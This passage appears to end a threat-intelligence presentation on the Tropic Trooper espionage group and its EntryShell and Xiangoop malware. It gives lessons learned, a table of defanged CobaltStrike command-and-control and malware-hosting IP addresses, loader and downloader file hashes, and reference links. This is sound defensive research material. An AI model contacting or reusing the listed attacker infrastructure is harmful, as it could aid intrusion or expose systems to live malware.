boundary between cyber and physical. ◼ EntryShell and Xiangoop have been updating to became more complex and sophisticated ----- ##### Lesson Learned ###### ◼ The threat actor uses all means to attack, so always investigate any suspicion and be prepared for the “unknown”. ◼ Don’t assume general-use items are always safe, that mindset is outdated. ◼ Always question everything and dig deeper. "Sharp insight" and "strong forensic/reversing skills" ----- |IP Address|Type| |---|---| |103.234.54[.]128 C|obaltStrike Beacon C2| |45.32.117[.]177 C|obaltStrike Beacon C2| |154.90.62[.]210 C|obaltStrike Beacon C2| |39.101.207[.]15 M|alware Hosted IP| |File Name|File Hash|Type| |---|---|---| |McVsoCfg.dll|D69C86EBB784DFF473816BE8D39F0627|XiangoopLoader| |McVsoCfg.dll|2d818d945736487efe67e626048d6073|XiangoopLoader| |WindowsPerformanceRecorde rUI.dll|83536db909a85f041398accd89167888|Downloader| |youdaodictupt.exe|16a37c7c2f8b7310ee8ef2dcd33af39b|Downloader| ``` IP Address Type 103.234.54[.]128 CobaltStrike Beacon C2 45.32.117[.]177 CobaltStrike Beacon C2 154.90.62[.]210 CobaltStrike Beacon C2 39.101.207[.]15 Malware Hosted IP File Name File Hash Type McVsoCfg.dll D69C86EBB784DFF473816BE8D39F0627 XiangoopLoader McVsoCfg.dll 2d818d945736487efe67e626048d6073 XiangoopLoader WindowsPerformanceRecorde 83536db909a85f041398accd89167888 Downloader rUI.dll youdaodictupt.exe 16a37c7c2f8b7310ee8ef2dcd33af39b Downloader Script.js E19abad9ec2887c9b6e4ccc62171f730 Powershell embededd ``` ----- ``` https://www.virusbulletin.com/uploads/pdf/conference/vb2023/slides/Slides-Unveiling-Activities-of- Tropic-Trooper.pdf https://blog-en.itochuci.co.jp/entry/2023/09/28/171001 https://blog-en.itochuci.co.jp/entry/2023/10/06/173200 https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_3_sasada_hazuru_en.pdf https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf https://citizenlab.ca/2016/11/parliament-keyboy/ https://www.macnica.co.jp/business/security/security-reports/pdf/cyberespionage_report_2022.pdf https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/ https://www.trendmicro.com/en_fi/research/23/h/earth-estries-targets-government-tech-for- cyberespionage.html https://www.eset.com/int/about/newsroom/press-releases/research/eset-research-discovers- famoussparrow-apt-group-spying-on-hotels-governments-and-private-companies/ https://blog-en.itochuci.co.jp/entry/2023/09/28/171001 ``` ----- -----